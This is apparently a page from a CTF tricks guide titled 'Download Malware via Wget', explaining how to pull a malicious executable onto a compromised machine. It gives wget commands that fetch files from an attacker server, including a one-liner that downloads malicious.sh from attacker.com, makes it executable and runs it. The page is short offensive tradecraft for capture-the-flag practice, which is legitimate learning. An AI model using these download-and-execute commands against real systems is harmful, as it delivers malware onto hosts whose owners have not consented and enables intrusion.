> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/web-delivery/trick-0265.md).

# Download Malware via Wget

***

Use `wget` to download a file, such as a malicious executable, from a remote server directly onto the target machine. Specify the output path and filename using the `-O` option. This option allows you to download a file and save it under a different name or in a different location than the source URL.

```bash
wget <attacker_server_url>/path/to/backup.elf -O /tmp/backup.elf
```

This command fetches the file `backup.elf` from the specified URL on the attacker's server and saves it as `/tmp/backup.elf` on the compromised system.

A common pattern in malicious activity is to download a script or executable and then immediately make it executable and run it. For example, a malicious shell script could be downloaded and executed using a sequence of commands:

```bash
wget http://attacker.com/malicious.sh -O /tmp/malicious.sh && chmod +x /tmp/malicious.sh && /tmp/malicious.sh
```

This downloads `malicious.sh` to `/tmp`, makes it executable using `chmod +x`, and then executes the script. Another similar example using the `-O` option is:

```bash
wget http://attacker.com/malicious.sh -O /tmp/malicious.sh
```

This specifically demonstrates the download and saving of the malicious file to a designated path and name using the `-O` option.
